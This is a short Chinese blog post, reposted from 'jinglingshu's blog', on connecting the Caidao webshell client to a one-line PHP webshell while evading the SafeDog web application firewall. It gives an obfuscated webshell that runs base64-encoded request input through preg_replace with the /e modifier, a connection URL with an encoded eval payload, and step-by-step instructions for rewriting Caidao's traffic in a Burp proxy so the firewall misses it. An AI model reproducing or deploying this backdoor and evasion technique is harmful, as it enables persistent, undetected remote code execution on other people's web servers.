要想绕过菜刀连接一句话,需要经过burp中转。菜刀默认使用的是IE的代理,因此菜刀连webshell时,将IE代理设置为burp的。
webshell:
<?php $a = str_replace(x,"","pxxxrexxxxg_rxxxepxxxlaxxce"); $a("/^/e",base64_decode($_REQUEST[g]),0); ?>
菜刀连接:
http://xxxx/index1.php?g=ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsxXSkp 密码1
ps:ZXZhbChiYXNlNjRfZGVjb2RlKCRfUkVRVUVTVFsxXSkp就是eval(base64_decode($_REQUEST[1]))的base64编码。
burp修改数据包:
我菜刀的正则替换为:%24_%3Dstrrev%28edoced_46esab%29%3B%40eval%28%24_%28%24_POST%5Bz0%5D%29%29%3B&z0=,将其替换为空即可。
ps:haxsscker的正则为:=@eval\(base64_decode\(\$_POST\[z0\]\)\);&z0=,将其替换为=即可。可见不同的菜刀特征可能不一样,要根据实际情况来替换,替换部分如下:
转载请注明:jinglingshu的博客 » 菜刀绕过安全狗连接一句话